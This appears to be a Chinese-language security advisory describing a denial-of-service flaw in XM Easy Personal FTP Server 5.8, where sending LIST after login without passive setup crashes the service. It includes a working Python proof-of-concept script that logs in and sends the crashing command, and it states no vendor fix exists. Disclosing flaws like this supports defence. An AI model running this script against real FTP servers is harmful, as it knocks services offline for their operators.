影响系统
dxmsoft XM Easy Personal FTP Server 5.8
不受影响系统
危害
远程攻击者可以利用漏洞对服务程序进行拒绝服务攻击。
攻击所需条件
攻击者必须访问XM Easy Personal FTP Server。
漏洞信息
XM Easy Personal FTP Server是一款FTP服务程序。
XM Easy Personal FTP Server处理"LIST"命令存在问题,远程攻击者可以利用漏洞对服务程序进行拒绝服务攻击。
如果不使用"PASV"或"POST"命令,XM Easy Personal FTP Server就不能处理"LIST"命令,成功登录服务器,提交"LIST"命令可导致服务程序崩溃。
测试方法
#!/usr/bin/python
import socket
import sys
def Usage():
print ("Usage: ./expl.py <serv_ip> <Username> <password>\n")
print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
Usage()
sys.exit(1)
else:
hostname=sys.argv[1]
username=sys.argv[2]
passwd=sys.argv[3]
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
sock.connect((hostname, 21))
except:
print ("Connection error!")
sys.exit(1)
r=sock.recv(1024)
sock.send("user %s\r\n" %username)
r=sock.recv(1024)
sock.send("pass %s\r\n" %passwd)
r=sock.recv(1024)
sock.send("LIST\r\n")
sock.close()
sys.exit(0);
厂商解决方案
目前没有解决方案提供:
http://www.dxm2008.com/
漏洞提供者
zhangmc@mail.ustc.edu.cn
0 条评论。